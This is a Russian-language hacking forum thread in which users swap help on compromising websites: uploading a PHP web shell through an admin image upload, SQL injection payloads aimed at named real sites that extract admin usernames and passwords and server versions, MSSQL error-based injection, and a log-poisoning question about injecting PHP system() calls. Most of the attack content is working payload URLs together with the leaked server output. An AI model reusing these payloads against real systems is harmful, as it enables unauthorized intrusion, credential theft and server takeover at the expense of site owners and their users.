при заливке шелла в админке вот что мне вылетело: Code: Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253 Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253 Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253 Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122 Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123 Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124 Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125 Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126 Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128 шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?
во-первых, загрузить корректный jpg(png,bmp,gif по вкусу) с кодом php-шелла - если расширение .php не меняется, ты смог это обойти или другой способ... то будет шелл. во-вторых, судя по ошибкам - там картинки пережимаются скриптом, так что все пхп-теги и код будет утерян. Шелла не видать тебе.
делаю запрос: http://test.ru/news.php?s=news_date%20DESC&v=0&newscat_id=-1+UNION%20SELECT%20concat(username,0x3a,password),2,3+from+admins ответ: Error: Illegal mix of collations for operation 'UNION' File: /var/www/test.ru/htdocs/news.php Line: 69 Query: SELECT newscat_id, newscat_title, newscat_dependency FROM newscats WHERE newscat_id=-1 UNION SELECT concat(username,0x3a,password),2,3 from admins LIMIT 1 Как я понимаю, это из-за кодировки. Как подправить запрос? Кодировка utf8
http://www.omega-pharma.be/EN/onafh_content.php?id=5+and+substring(version(),1,1)=4 или через ошибку попробуй
http://www.omega-pharma.be/EN/onafh_content.php?id=(4)or(1,1)=(select(count(0)),concat((version()),floor(rand(0)*2))from(login)GROUP BY 2) Duplicate entry '4.1.21-standard1' for key 1
http://www.retention.se/news.asp?id=1'&pg=1 вот никак не могу раскрутить инъекцию. Максимум что удалось: 1) узнать количество полей 2) и добыть информацию с последней талблицы в бд с помощью "having" ни версии, ни имени бд, пользователя никак. В чем может быть проблема?
тож не выводит. Выводит только то что и при запросе http://www.retention.se/news.asp?id=1&pg=1 без всяких там ошибок и т.д.
Code: http://www.retention.se/news.asp?id=1+or+1=convert(int,@@version)&pg=1 System information: ----------------------------------------- system_user: retenti_groupse @@version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) db_name(): retenti_se select фильтруется, думай
Подскажите как передать гет запрос с <? system.... ?> , что бы в логах скобочки не заменились на %3c %3e
Всем привет! наткнулся на такую ошибку... Code: Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 42 in /home/site/public_html/php/config/functions.php on line 931 Урл вида: http://.sita.net/index.php?id=11&new=-6 Можно ли провести инъекцию
pinch http://www.retention.se/news.asp?id=1+and+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)&pg=1 и далее по сценарию ====================== Pashkela Опять у тебя ненужные навороты. Они запутывают людей Зачем Если http://www.retention.se/news.asp?id=1+or+1=@@version&pg=1
Бгг да точно) но как бы он его как-то залил... логика значит надо залить с другим расширением ато да читалка)